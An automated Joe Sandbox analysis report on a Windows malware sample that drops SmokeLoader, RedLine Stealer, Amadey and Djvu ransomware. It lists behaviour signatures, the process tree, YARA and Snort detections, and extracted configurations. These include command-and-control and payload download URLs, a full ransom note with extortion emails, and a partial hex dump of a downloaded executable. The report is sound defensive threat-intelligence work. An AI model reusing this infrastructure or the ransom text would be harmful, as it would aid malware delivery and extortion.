Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:722349
MD5:9e93319d00389f1c55611665e404ea9b
SHA1:23aa8aed6a57519e0c4107fc6f6a7f16efe20741
SHA256:4e189ba8eaaecc5142cc89fe40d696d216291e906f66b261af8bb0eda2bdcf60
Tags:exe
Infos:

Detection

Amadey, Djvu, Fabookie, RedLine, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Detected VMProtect packer
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)

Classification

  • System is w10x64
  • file.exe (PID: 5796 cmdline: C:\Users\user\Desktop\file.exe MD5: 9E93319D00389F1C55611665E404EA9B)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • ECFD.exe (PID: 4352 cmdline: C:\Users\user\AppData\Local\Temp\ECFD.exe MD5: 3FD2BBEEEF907E2943FF4E2F6FB24E9A)
        • ECFD.exe (PID: 5920 cmdline: C:\Users\user\AppData\Local\Temp\ECFD.exe MD5: 3FD2BBEEEF907E2943FF4E2F6FB24E9A)
      • F4FD.exe (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\F4FD.exe MD5: 248CBD4B28F796FDBE02725BDB75751A)
      • 857.exe (PID: 4680 cmdline: C:\Users\user\AppData\Local\Temp\857.exe MD5: DCB68CBD2858A21413D9EEF6CEB74743)
      • 2A57.exe (PID: 4476 cmdline: C:\Users\user\AppData\Local\Temp\2A57.exe MD5: D4381F0A771033752684747EB4D55FC7)
      • 3804.exe (PID: 812 cmdline: C:\Users\user\AppData\Local\Temp\3804.exe MD5: DCFBBF3AE2711BDA9BF01083B521D01B)
        • WerFault.exe (PID: 4788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 543.exe (PID: 4500 cmdline: C:\Users\user\AppData\Local\Temp\543.exe MD5: 9A1AC1F6D72E30C8E7577955CD6F39C0)
        • WerFault.exe (PID: 4988 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 532 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • EAA.exe (PID: 3524 cmdline: C:\Users\user\AppData\Local\Temp\EAA.exe MD5: D4381F0A771033752684747EB4D55FC7)
      • explorer.exe (PID: 3624 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5300 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • tfgatra (PID: 3484 cmdline: C:\Users\user\AppData\Roaming\tfgatra MD5: 9E93319D00389F1C55611665E404EA9B)
  • udgatra (PID: 2296 cmdline: C:\Users\user\AppData\Roaming\udgatra MD5: 248CBD4B28F796FDBE02725BDB75751A)
  • cleanup
{"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-oTIha7SI4s\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0581Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0DHLQow38Yj94BoPaKY\\/\\\\nkZ\\/yEY1RzWxzmDftZZlcCpAjwSZl\\/PVM\\/38QBxbljjR\\/mKH6A\\/4apPkGdaYzZ5gq\\\\n3y\\/0Fi9Fy1HJdZqJaJuh2ZoHZolaoeEJevdIfB\\/\\/NtOD1F3cgYikx+cRk0D9h2zm\\\\nVnm\\/c9br2PDvJh1JOnX8sA1w8yzOhUc8TywSMOdebv9WDreExUy3dfdOy+39565p\\\\nuPZZD+Z1\\/46W67DDZfVvoVCZG67D3m5Z3ilmrKQo+3U78sJsLGumucfZDQ4jRVEA\\\\nXs9AqIsN9Vo3uV+8t9QSl5uwYeS+iZihFvJC413sT+qwe2+\\/+BDLK0lkFwhyOKo+\\\\n1QIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x50cb:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x4c5f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          Click to see the 41 entries
          SourceRuleDescriptionAuthorStrings
          0.3.file.exe.730000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            4.2.tfgatra.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              4.2.tfgatra.5a0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                9.0.ECFD.exe.400000.5.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
                • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
                0.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 33 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.5172.67.203.21349696802039103 10/13/22-13:07:19.527031
                  SID:2039103
                  Source Port:49696
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.545.138.74.5249697802018581 10/13/22-13:07:17.952056
                  SID:2018581
                  Source Port:49697
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\EAA.exeAvira: detection malicious, Label: HEUR/AGEN.1210630
                  Source: C:\Users\user\AppData\Local\Temp\2A57.exeAvira: detection malicious, Label: HEUR/AGEN.1210630
                  Source: kkh.eiwagggg.comVirustotal: Detection: 5%Perma Link
                  Source: en.eredirected.xyzVirustotal: Detection: 21%Perma Link
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\ECFD.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\EAA.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\2A57.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\udgatraJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\9763.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\EB37.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\B03C.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\tfgatraJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\543.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\857.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\3804.exeJoe Sandbox ML: detected
                  Source: 10.0.3804.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 10.0.3804.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 10.0.3804.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 10.0.3804.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
                  Source: 9.0.ECFD.exe.400000.7.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-oTIha7SI4s\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0581Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknownHTTPS traffic detected: 172.67.144.83:443 -> 192.168.2.5:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.5:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.23.58.153:443 -> 192.168.2.5:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49745 version: TLS 1.2
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
                  Source: Binary string: #+C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: .C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
                  Source: Binary string: ]C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
                  Source: Binary string: C:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
                  Source: Binary string: MC:\ziradevetu84\faduxusiyipa29\jigi.pdb( source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: CC:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
                  Source: Binary string: C:\ziradevetu84\faduxusiyipa29\jigi.pdb source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

                  Networking

                  barindex
                  Source: C:\Windows\explorer.exeDomain query: kkh.eiwagggg.com
                  Source: C:\Windows\explorer.exeDomain query: keziheritier.com
                  Source: C:\Windows\explorer.exeDomain query: github.com
                  Source: C:\Windows\explorer.exeDomain query: furubujjul.net
                  Source: C:\Windows\explorer.exeDomain query: pelegisr.com
                  Source: C:\Windows\explorer.exeDomain query: www.rukangiralawchambers.org
                  Source: C:\Windows\explorer.exeDomain query: avtlsgosecure.com
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.138.74.52 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 179.43.163.115 80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49696 -> 172.67.203.213:80
                  Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49697 -> 45.138.74.52:80
                  Source: DNS query: jamesmillion.xyz
                  Source: DNS query: en.eredirected.xyz
                  Source: DNS query: en.xml-post.xyz
                  Source: Malware configuration extractorURLs: http://winnlinne.com/lancer/get.php
                  Source: Malware configuration extractorURLs: http://liubertiyyyul.net/
                  Source: Malware configuration extractorURLs: http://bururutu44org.org/
                  Source: Malware configuration extractorURLs: http://youyouumenia5.org/
                  Source: Malware configuration extractorURLs: http://nvulukuluir.net/
                  Source: Malware configuration extractorURLs: http://nuluitnulo.me/
                  Source: Malware configuration extractorURLs: http://guluiiiimnstra.net/
                  Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Oct 2022 11:07:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 13 Oct 2022 11:00:53 GMTETag: "34a00-5eae86c49704d"Accept-Ranges: bytesContent-Length: 215552Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 9c 0f ba d7 fd 61 e9 d7 fd 61 e9 d7 fd 61 e9 c9 af f4 e9 c0 fd 61 e9 c9 af e2 e9 ac fd 61 e9 f0 3b 1a e9 d0 fd 61 e9 d7 fd 60 e9 41 fd 61 e9 c9 af e5 e9 e3 fd 61 e9 c9 af f5 e9 d6 fd 61 e9 c9 af f0 e9 d6 fd 61 e9 52 69 63 68 d7 fd 61 e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 58 a7 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d6 01 00 00 5a 17 00 00 00 00 00 f6 a0 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 19 00 00 04 00 00 c0 8d 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc d7 01 00 50 00 00 00 00 d0 18 00 38 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa d4 01 00 00 10 00 00 00 d6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 1c dd 16 00 00 f0 01 00 00 22 01 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 4c 00 00 00 d0 18 00 00 4e 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
